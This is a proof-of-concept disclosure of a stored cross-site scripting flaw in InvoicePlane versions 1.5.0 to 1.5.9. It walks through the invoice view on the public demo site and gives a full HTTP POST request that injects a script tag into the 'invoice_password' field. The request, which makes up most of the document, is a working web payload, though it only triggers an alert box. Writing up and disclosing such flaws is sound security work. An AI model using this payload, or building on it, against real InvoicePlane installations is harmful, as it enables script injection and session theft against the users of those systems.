POC:
A Stored Cross-site scripting (XSS) was discovered in InvoicePlane application
versions from v1.5.0 to v1.5.9(https://github.com/InvoicePlane/InvoicePlane)
After logging into the InvoicePlane application, browse to "view invoices" option
available at https://demo.invoiceplane.com/index.php/invoices/status/all and select any ivoice
for Demonstartion, https://demo.invoiceplane.com/index.php/invoices/view/27. In this invoice page
inject a JavaScript payload in "PDF password" parameter input.
Injected JS payload will be sent to server as POST parameter data in "invoice_password" POST field
Below is the POST Request for the InvoicePlane Application to execute Stored XSS: (Invoice_password parameter is vulnerable to Stored XSS):
POST /index.php/invoices/ajax/save HTTP/1.1
Host: demo.invoiceplane.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.invoiceplane.com/index.php/invoices/view/32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 786
Cookie: ip_csrf_cookie=e6daab2293247ef975dc1e2bf621716e; ip_session=ki8khmtnpv7t3jkcj0q6dvsjm46oa6va
Connection: close
invoice_id=32&
invoice_number=INV-19-0032&
invoice_date_created=01%2F30%2F2019&
invoice_date_due=03%2F01%2F2019&
invoice_status_id=1&
invoice_password=tester"><script>alert("StoredXSS")</script>&
items=%5B%7B%22invoice_id%22%3A%2232%22%2C%22item_id%22%3A%22%22%2C%22item_product_id%22%3A%22%22%2C%22item_task_id%22%3A%22%22%2C%22item_name%22%3A%22%22%2C%22item_quantity%22%3A%22%22%2C%22item_price%22%3A%22%22%2C%22item_discount_amount%22%3A%22%22%2C%22item_tax_rate_id%22%3A%220%22%2C%22item_description%22%3A%22%22%2C%22item_product_unit_id%22%3A%220%22%2C%22item_order%22%3A1%7D%5D&
invoice_discount_amount=&
invoice_discount_percent=&
invoice_terms=&
custom%5B0%5D%5Bname%5D=custom%5B3%5D&
custom%5B0%5D%5Bvalue%5D=&
payment_method=0&
_ip_csrf=e6daab2293247ef975dc1e2bf621716e